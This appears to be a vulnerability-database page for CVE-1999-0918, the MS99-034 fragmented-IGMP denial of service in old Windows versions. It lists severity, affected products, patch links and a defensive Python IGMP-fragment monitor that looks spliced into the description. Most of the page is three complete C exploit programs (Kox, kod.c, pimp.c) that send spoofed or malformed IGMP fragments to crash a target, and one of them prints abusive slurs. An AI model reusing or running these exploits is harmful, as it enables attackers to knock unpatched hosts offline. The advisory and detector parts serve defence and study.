CVE-1999-0918
CVSS7.8
Published: 1999-07-03 00:00:00
Revised: 2008-09-09 00:00:00
NMCOE    

[Original] Denial of service in various Windows systems via malformed, fragmented IGMP packets.


[CNNVD] Microsoft Windows Invalid IGMP Header Packet Denial of Service Vulnerability (MS99-034) (CNNVD-199907-007)

        
        IGMP (Internet Group Management Protocol) lets every system on a physical network learn which multicast groups a host currently belongs to.
        Early Windows systems mishandle fragmented IGMP packets, and a remote attacker may exploit this to mount a denial-of-service attack against the target system.
        On MS Windows NT 4.0/95/98/98v2, fragmented IGMP packets can cause the TCP/IP stack to access invalid memory, ultimately crashing the system with a blue screen. An attacker can carry out the denial of service by sending IGMP fragments in stages. Information on this vulnerability can be found in newsgroups and mailing lists by searching for keywords such as IGMP NUKE and IGMP DOS.
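The description above, and the workaround further down that recommends blocking IGMP at network devices, both turn on IP-level fragmentation of IGMP messages. As an added illustration, not part of this record or of any of the exploit listings below, the Python parser and monitor here inspects raw IPv4 datagrams and flags the traits a defender would alert on: IGMP carried in fragments, a non-first fragment arriving before its first fragment, and IGMP type codes outside those defined in RFC 1112, RFC 2236 and RFC 3376. All addresses, IP ids and packets are constructed fixtures; the `make_ipv4` helper only builds byte strings for the monitor to read and never touches a socket.

```python
import struct
from dataclasses import dataclass
from typing import List

IPPROTO_IGMP = 2
IP_MF = 0x2000        # "more fragments" bit in the IPv4 fragment field
IP_OFFMASK = 0x1FFF   # 13-bit fragment offset, in 8-byte units
# IGMP message types defined in RFC 1112, RFC 2236 and RFC 3376
KNOWN_IGMP_TYPES = {0x11, 0x12, 0x16, 0x17, 0x22}


@dataclass
class IPv4Header:
    ihl: int            # header length in bytes
    total_length: int
    ident: int
    more_fragments: bool
    frag_offset: int    # in bytes
    protocol: int
    src: str
    dst: str


def parse_ipv4(pkt: bytes) -> IPv4Header:
    """Decode the fixed 20-byte IPv4 header; options are skipped via IHL."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, tot_len, ident, frag, _ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or ihl > len(pkt):
        raise ValueError("bad IHL")
    return IPv4Header(ihl, tot_len, ident, bool(frag & IP_MF),
                      (frag & IP_OFFMASK) * 8, proto,
                      ".".join(map(str, src)), ".".join(map(str, dst)))


class IgmpFragmentMonitor:
    """Flags IGMP datagrams that are fragmented, arrive out of order, or carry
    unknown type codes. State is kept per (src, dst, IP id) reassembly key."""

    def __init__(self):
        self.seen_first = set()   # keys whose offset-0 fragment has been seen

    def inspect(self, pkt: bytes) -> List[str]:
        hdr = parse_ipv4(pkt)
        if hdr.protocol != IPPROTO_IGMP:
            return []
        reasons = []
        key = (hdr.src, hdr.dst, hdr.ident)
        if hdr.more_fragments or hdr.frag_offset > 0:
            reasons.append(f"fragmented IGMP (MF={int(hdr.more_fragments)}, "
                           f"offset={hdr.frag_offset})")
        if hdr.frag_offset == 0:
            self.seen_first.add(key)
            body = pkt[hdr.ihl:]
            if len(body) < 8:          # IGMPv1/v2 messages are exactly 8 bytes
                reasons.append("IGMP message shorter than 8 bytes")
            elif body[0] not in KNOWN_IGMP_TYPES:
                reasons.append(f"unknown IGMP type 0x{body[0]:02x}")
        elif key not in self.seen_first:
            reasons.append(f"non-first fragment seen before first fragment (id={hdr.ident})")
        if hdr.frag_offset + (len(pkt) - hdr.ihl) > 65535:
            reasons.append("fragment extends past maximum IP datagram size")
        return reasons


def make_ipv4(payload: bytes, *, proto=IPPROTO_IGMP, ident=1, mf=False, offset=0,
              src="192.0.2.10", dst="192.0.2.20") -> bytes:
    """Constructed test fixture: wrap payload in a raw IPv4 header (checksum left 0)."""
    frag = (IP_MF if mf else 0) | (offset // 8)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, frag,
                      64, proto, 0,
                      bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return hdr + payload


# Constructed samples (not captured traffic):
# a normal 8-byte IGMPv2 membership report for 224.0.0.251
NORMAL_REPORT = make_ipv4(bytes([0x16, 0, 0, 0]) + bytes([224, 0, 0, 251]))
# the shape the record describes: large fragments, type byte 0, MF set, rising offsets
FRAG_FIRST = make_ipv4(bytes(1480), ident=7, mf=True, offset=0)
FRAG_MIDDLE = make_ipv4(bytes(1480), ident=7, mf=True, offset=1480)
# a non-first fragment for a datagram whose first fragment never arrived
ORPHAN = make_ipv4(bytes(200), ident=9, mf=True, offset=14800)


def demo():
    """Run the monitor over the constructed samples; returns reasons per sample."""
    mon = IgmpFragmentMonitor()
    return {name: mon.inspect(p) for name, p in
            [("normal", NORMAL_REPORT), ("first", FRAG_FIRST),
             ("middle", FRAG_MIDDLE), ("orphan", ORPHAN)]}


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", reasons or "ok")
```

In practice the monitor would be fed from a capture source, keyed on the same (src, dst, id) triple the receiving stack uses for reassembly; the simpler blocking rule from the workaround section (drop protocol 2 at the network edge) covers the same traffic without needing per-flow state.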
        

- CVSS (base score)

CVSS score: 7.8 [HIGH]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: COMPLETE [may bring the system down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CWE (weakness category)

CWE-20 [Improper Input Validation]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_nt:4.0:sp5 - Microsoft Windows 4.0 sp5
cpe:/o:microsoft:windows_2000 - Microsoft Windows 2000
cpe:/o:microsoft:windows_95 - Microsoft Windows 95
cpe:/o:microsoft:windows_nt:4.0:sp3 - Microsoft Windows 4.0 sp3
cpe:/o:microsoft:windows_98::gold - Microsoft windows 98_gold
cpe:/o:microsoft:windows_nt:4.0:sp1 - Microsoft Windows 4.0 sp1
cpe:/o:microsoft:windows_nt:4.0:sp4 - Microsoft Windows 4.0 sp4
cpe:/o:microsoft:windows_nt:4.0 - Microsoft Windows NT 4.0
cpe:/o:microsoft:windows_nt:4.0:sp2 - Microsoft Windows 4.0 sp2

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0918
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0918
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-007
(official data source) CNNVD

- Other links and resources

http://www.microsoft.com/technet/security/bulletin/ms99-034.mspx
(PATCH)  MS  MS99-034
http://www.securityfocus.com/bid/514
(UNKNOWN)  BID  514
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q238329
(UNKNOWN)  MSKB  Q238329

- Vulnerability information

Microsoft Windows Invalid IGMP Header Packet Denial of Service Vulnerability (MS99-034)
High Other
1999-07-03 00:00:00 2006-04-19 00:00:00
Remote / Local
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Since ordinary applications do not need IGMP, IGMP packets can be blocked on network devices.
        Vendor patch:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS99-034) and a corresponding patch:
        MS99-034: Patch Available for "Fragmented IGMP Packet" Vulnerability
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS99-034.asp

        Patch download:
        Windows 98:

        http://www.microsoft.com/windows98/downloads/corporate.asp

        Windows NT Workstation 4.0; Windows NT Server 4.0;
        Windows NT Server, Enterprise Edition:
        ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP5/IGMP-fix/
        Windows NT Server 4.0, Terminal Server Edition:
        ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40TSE/hotfixes-postSP5/IGMP-fix/
        You can also update directly from:

        http://www.microsoft.com/windowsupdate

- Vulnerability information (19413)

Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (1) (EDBID:19413)
windows dos
1999-07-03 Verified
0 Coolio
N/A [Download]
source: http://www.securityfocus.com/bid/514/info


The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. 

/***
        Kox by Coolio (coolio@k-r4d.com)

        this was a successful attempt to duplicate klepto/defile's kod win98
        exploit and add spoofing support to it. me and defile made this a
        race to see who could do spoofing kod first. he won. (mine's better!)
        my kox and defile's skod output about the same packets
        but he had skod working a few hours before i had kox working.

        affected systems: windows 98, windows 98 SE, windows 2000 build 2000
        results: bluescreen, tcp/ip stack failure, lockup, or instant reboot

        thanks to klepto and defile for making kod, psilord for wanting
        to understand what we were doing, greg for telling me about iphdr.ihl,
        mancide for letting me use his win98 boxen to test on, and the
        few other people i crashed trying to get this working right.

        also thanks to the authors of elvis for making such a badass editor.
***/



#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <pwd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>



void usage(char *arg)
{
        printf("Kox by Coolio (coolio@k-r4d.com)\n");
        printf("Usage: %s <victim>\n", arg);
        exit(1);
}


unsigned int randip()
{
        struct hostent *he;
        struct sockaddr_in sin;
        char *buf = (char *)calloc(1, sizeof(char) * 16);

        sprintf(buf, "%d.%d.%d.%d",
                (random()%191)+23,
                (random()%253)+1,
                (random()%253)+1,
                (random()%253)+1); 

        inet_aton(buf, (struct in_addr *)&sin);
        return sin.sin_addr.s_addr;
}

unsigned short in_cksum(unsigned short *buh, int len)
{
        register long sum = 0;
        unsigned short oddbyte;
        register unsigned short answer;

        while(len > 1) {
                sum += *buh++;
                len -= 2;
        }

        if(len == 1) {
                oddbyte = 0;
                *((unsigned char *)&oddbyte) = *(unsigned char *)buh;
                sum += oddbyte;
        }

        sum = (sum >> 16) + (sum & 0xFFFF);
        sum += (sum >> 16);
        answer = ~sum;
        return answer;
}

int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof)
{
        int BIGIGMP = 1500;
        unsigned char *pkt;
        struct iphdr *ip;
        struct igmphdr *igmp;
        struct utsname *un;
        struct passwd *p;

        int i, s;
        int id = (random() % 40000) + 500;

        pkt = (unsigned char *)calloc(1, BIGIGMP);
        ip = (struct iphdr *)pkt;
        igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));

        ip->version = 4;
        ip->ihl = (sizeof *ip) / 4;
        ip->ttl = 255;
        ip->tot_len = htons(BIGIGMP);
        ip->protocol = IPPROTO_IGMP;
        ip->id = htons(id);
        ip->frag_off = htons(IP_MF);
        ip->saddr = spoof;
        ip->daddr = victim->sin_addr.s_addr;
        ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));

        igmp->type = 0;
        igmp->group = 0;
        igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));

        for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
            i < BIGIGMP; i++)
                pkt[i] = random() % 255;
#ifndef I_GROK
        un = (struct utsname *)(pkt + sizeof(struct iphdr) +
              sizeof(struct igmphdr) + 40);
        uname(un);
        p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
        memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
#endif
        if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                perror("error: socket()");
                return 1;
        }

        if(sendto(s, pkt, BIGIGMP, 0, victim,
           sizeof(struct sockaddr_in)) == -1) { 
                perror("error: sendto()");
                return 1;
        }
        usleep(1000000);

        for(i = 1; i < 5; i++) {
                if(i > 3)
                        ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
                else
                        ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
                sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
                usleep(2000000);
        }

        free(pkt);
        close(s);
        return 0;
}

int main(int argc, char *argv[])
{
        struct sockaddr_in victim;
        struct hostent *he;
        int i;

        srandom(time(NULL));

        if(argc < 2)
                usage(argv[0]);

        if((he = gethostbyname(argv[1])) == NULL) {
                herror(argv[1]);
                exit(1);
        }
        memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);
        victim.sin_port = htons(0);
        victim.sin_family = PF_INET;

        printf("IGMP> ");
        fflush(stdout);
        for(i = 0; i < 10; i++)
        {
                nuke_igmp(&victim, randip());
                printf(".");
                fflush(stdout);
        }
        printf("\n");
        fflush(stdout);
}
		

- Vulnerability information (19414)

Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (2) (EDBID:19414)
windows dos
1999-07-03 Verified
0 klepto
N/A [Download]
source: http://www.securityfocus.com/bid/514/info
 
 
The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. 

/*
::: kod.c (kiss of death) version 1.2
::: [author] kod.c bug found by klepto /
klepto@levitate.net / rewritten by ignitor / ignitor@EFnet
::: [stuph ] works on bsd/linux/*nix
::: [notes ] bluescreens windows users(98/98se) and kills
tcp stack
::: [m$ bug] windows handles igmp badly and this is the
result
::: [greets]
amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotr
ip/TFreak/napster
::: [greets] dist(test monkey)/naz(you rule period.)/#havok/
#irc_addict/#kgb/#eof/everyone
::: [action] ./kod <host> and BEWM!
::: [rant  ] there will be lots of rewrites to this.. just
get our name right!
de omnibus dubitandum
*/

/*
windows core dump output (*whee*)
An exception 0E has occurred at 0028:C14C9212 in VxD VIP
(01) +
00006C72.  This was called from 0028:C183FF54 in VcD PPPMAC
(04) +
000079BR.  It may be possible to continue normally(*not*).
*/


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr
{
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
};

struct igmphdr
{
  unsigned char type, code;
  unsigned short cksum;
  struct in_addr group;
};

unsigned short in_chksum(unsigned short *, int);
long resolve(char *);

long resolve(char *host)
{
  struct hostent *hst;
  long addr;

  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);

  memcpy(&addr, hst->h_addr, hst->h_length);

  return(addr);
}

int main(int argc, char *argv[])
{
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmphdr *igmp;
  long daddr, saddr;
  int s, i=0, c, len;
  char buf[1500];

  if (argc < 3)
  {
    printf("KOD spoofer by Ignitor and klepto\n");
    printf("Usage: %s <src> <dst>\n", *argv);
    return(1);
  }

  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);

  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)];

  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;

  ip->ihl = 5;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(10933);
  ip->id = htons(48648);
  ip->ttl = 64;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;

  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);

  printf("Sending IGMP packets: %s -> %s\n", argv[1], argv[2]);

  for (c=0;c<2;c++)
  {
    len = 220;
    ip->frag_off = htons(0x73a);

    for (i=0;;i++)
    {
      if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1)
      {
        perror("Error sending packet");
        exit(-1);
      }
      if (ntohs(ip->frag_off) == 0x2000)
        break;
      len = 1500;
      if (!i)
        ip->frag_off = htons(0x2681);
      else
        ip->frag_off = htons(ntohs(ip->frag_off) - 185);

      ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
    }
  }

  return(1);
}

unsigned short in_chksum(unsigned short *addr, int len)
{
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;

   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }

   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }

   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

		

- Vulnerability information (19415)

Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (3) (EDBID:19415)
windows dos
1999-04-06 Verified
0 Rob Mosher
N/A [Download]
source: http://www.securityfocus.com/bid/514/info
  
  
The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. 

/*
** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org
** exploits bug in m$'s ip stack
** rewrite by nyt@EFnet
** bug found by klepto
** usage: pimp <host>
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <sys/socket.h>

struct igmp
{
        unsigned char igmp_type;
        unsigned char igmp_code;
        unsigned short igmp_cksum;
        struct in_addr igmp_group;
};

#define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);}

u_long  resolve(char *);

int main(int argc, char *argv[])
{
 int nsock, ctr;
 char *pkt, *data;
 struct ip *nip;
 struct igmp *nigmp;
 struct sockaddr_in s_addr_in;

 setvbuf(stdout, NULL, _IONBF, 0);

 printf("pimp.c by nyt\n");

 if(argc != 2)
  ERROR("usage: pimp <host>");

 if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
  ERROR("could not create raw socket");

 pkt = malloc(1500);
 if(!pkt)
  ERROR("could not allocate memory");

 memset(&s_addr_in, 0, sizeof(s_addr_in));
 memset(pkt, 0, 1500);

 nip = (struct ip *) pkt;
 nigmp = (struct igmp *) (pkt + sizeof(struct ip));
 data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp));
 memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp)));

 s_addr_in.sin_addr.s_addr = resolve(argv[1]);

 nip->ip_v  = 4;
 nip->ip_hl  = 5;
 nip->ip_tos  = 0;
 nip->ip_id  = 69;
 nip->ip_ttl  = 255;
 nip->ip_p  = IPPROTO_IGMP;
 nip->ip_sum  = 0;
 nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr;
 nip->ip_src.s_addr = 2147100000;
 nigmp->igmp_type = 2;
 nigmp->igmp_code = 31;
 nigmp->igmp_cksum = 0;

 inet_aton("128.1.1.1", &nigmp->igmp_group);

 printf("pimpin' dem trick-ass-bitches");

 for(ctr = 0;ctr < 15;ctr++)
 {
  printf(".");
  nip->ip_len  = 1500;
  nip->ip_off  = htons(IP_MF);
  sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));

  nip->ip_off  = htons(1480/8)|htons(IP_MF);
  sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));

  nip->ip_off  = htons(5920/8)|htons(IP_MF);
  sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));

  nip->ip_len   = 831;
  nip->ip_off  = htons(7400/8);
  sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));

  usleep(500000);
}

 printf("*slap* *slap* bitch, who yo daddy\n");
 shutdown(nsock, 2);
 close(nsock);
}

u_long resolve(char *host)
{
        struct hostent *he;
        u_long ret;

        if(!(he = gethostbyname(host)))
        {
                herror("gethostbyname()");
                exit(-1);
        }
        memcpy(&ret, he->h_addr, sizeof(he->h_addr));
        return ret;
}

		

- Vulnerability information

1022
Microsoft Windows Invalid IGMP Header Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

- Timeline

1999-07-04 Unknown
1999-07-04 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.